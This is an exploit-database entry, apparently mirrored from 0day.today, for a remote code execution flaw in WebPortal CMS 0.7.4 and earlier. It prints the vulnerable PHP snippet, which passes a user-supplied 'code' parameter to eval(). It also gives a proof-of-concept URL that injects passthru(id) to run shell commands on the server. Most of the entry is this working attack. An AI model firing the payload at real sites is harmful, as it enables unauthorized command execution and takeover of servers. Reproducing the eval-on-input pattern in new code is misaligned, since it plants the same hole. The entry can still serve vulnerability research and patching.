id: 3736
date: 09/22/2008
title: WebPortal CMS <= 0.7.4 (code) Remote Code Execution Vulnerability
author: GoLd_M
cves: 

=================================================================
WebPortal CMS <= 0.7.4 (code) Remote Code Execution Vulnerability
=================================================================


WebPortal <= 0.7.4 (code) Remote Code Execution Vulnerability
Download : http://webportal.ivanoculmine.com/download.php?mid=14
Vuln :
######################################################################
        <?
        if ($_GET["action"] == "execute") {
          eval (stripslashes($_POST["code"]));
        }
        ?>
######################################################################
POC :
/index.php?m=admin&f=console&action=execute&code=(id);} passthru(id);
######################################################################



#  0day.today [2023-03-26]  #